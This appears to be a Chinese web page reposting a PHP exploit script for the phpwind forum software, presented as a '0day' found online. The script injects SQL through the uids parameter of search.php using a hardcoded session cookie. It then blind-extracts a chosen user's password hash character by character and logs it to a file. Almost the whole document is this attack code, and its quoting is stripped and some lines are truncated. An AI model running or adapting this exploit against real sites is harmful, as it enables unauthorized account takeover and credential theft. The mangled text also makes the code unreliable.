从网上搜到的phpwind 0day的代码

　　<html>
<head>
<meta http-equiv=Content-Type content=text/html; charset=gb2312>
<title>Codz By 剑心</title>
<style type=text/css>
body,td {
font-family: Tahoma;
font-size: 12px;
line-height: 150%;
}
.smlfont {
font-family: Tahoma;
font-size: 11px;
}
FONT-SIZE: 12px;
COLOR: #000000;
BACKGROUND-COLOR: #FFFFFF;
height: 18px;
border: 1px solid #666666;
padding-left: 2px;
}
.redfont {
COLOR: #A60000;
}
a:link,a:visited,a:active {
color: #000000;
text-decoration: underline;
}
a:hover {
color: #465584;
text-decoration: none;
}
.firstalt {BACKGROUND-COLOR: #EFEFEF}
.secondalt {BACKGROUND-COLOR: #F5F5F5}
</style>
<center>The Exploiet Of The All Phpwind Version</center>
<center> BY 剑心</center>
<br>
<br>
<br>
<br>
<br>

　　<?php
ini_set(max_execution_time,0);
error_reporting(7);

　　$path=/search.php;
$cookie=lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D;

　　$uid=2;
$_GET[uid]&&$uid=$_GET[uid];
$tid=539264;

　　$mask=没有查找匹配的内容;
$count=0;

　　//$testing=1;
//$testing=$_GET[test];
if($testing) {preg_match(/X-Powered-By: php\/(.+)\r\n/ie,send(),$php);echo$php[1];die();}

　　//$debug=1;

　　
$temp=md5(rand(1,100)+microtime());
$cmd=step=3&pwuser=.$temp.loveshell.&uids=-1.$sql./*j&184288238=kkkk&276791066=jjjjjj;
$response=send($cmd);

　　preg_match(/FROM (.+)threads/ie,$response,$match);

　　$pre=$match[1];
if ($match[1]) echo Good Job!Wo Got The pre: <font color=red>.$match[1].</font><br>;
else if (strpos($response,value=登 录)) die(You Are Not Login!Try to get anthor Cookie and Useragen value!<br>);
else {echo Maybe It is not vul!<br>;die();}

　　echo Try to Get the uid=$uid s Password:<font color=red>;
$log=fopen(log.txt,a+);

　　
for($i=0;$i<16;$i++)
{

　　$type=0;
$sub=$i+9;
$temp=md5(rand(1,100)+microtime());
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd=step=3&pwuser=.$temp.loveshell.&uids=-1).$sql./*.&184288238=kkkk&276791066=jjjjjj;
if(!strpos(send($cmd),$mask)) {

　　$type=0;
for($m=48;$m<=57;$m++){
$temp=md5(rand(1,100)+microtime());
$sql= union select $tid from .$pre.members where uid=$uid and ord(mid(password,$sub,1))=$m;
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd=step=3&pwuser=.$temp.loveshell.&uids=-1).$sql./*.&184288238=kkkk&276791066=jjjjjj;
if(!strpos(send($cmd),$mask)) {

　　echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

　　$sql= union select $tid from .$pre.members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123;
$sql=urlencode($sql);
$temp=md5(rand(1,10000)+microtime());
$cmd=step=3&pwuser=.$temp.loveshell.&uids=-1).$sql./*.&184288238=kkkk&276791066=jjjjjj;
if(!strpos(send($cmd),$mask)) {

　　$type=1;
for($m=97;$m<=122;$m++){
$temp=md5(rand(1,100)+microtime());
$sql= union select $tid from .$pre.members where uid=$uid and ord(mid(password,$sub,1))=$m;
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd=step=3&pwuser=.$temp.loveshell.&uids=-1).$sql./*.&184288238=kkkk&276791066=jjjjjj;
if(!strpos(send($cmd),$mask)) {
echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

　　echo error!<br>;
die(Shit!May be the data you post is Not valid!Try anthor UID\r\n);

　　
}
fclose($log);
echo <br>Done!We Post $count times!<br>;

　　
function send($cmd)
{
global $path,$server,$cookie,$count,$useragent,$debug;

　　$count=$count+1;
$message = POST .$path.? HTTP/1.1\r\n;
$message .= Accept: */*\r\n;
$message .= Accept-Language: zh-cn\r\n;
$message .= Referer:
$message .= Content-Type: application/x-
$message .= User-Agent: .$useragent.\r\n;
$message .= Host: .$server.\r\n;
$message .= Content-length: .strlen($cmd).\r\n;
$message .= Connection: Keep-Alive\r\n;
$message .= Cookie: .$cookie.\r\n;
$message .= \r\n;
$message .= $cmd.\r\n;

　　$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = <pre>;
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .=</pre>;
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>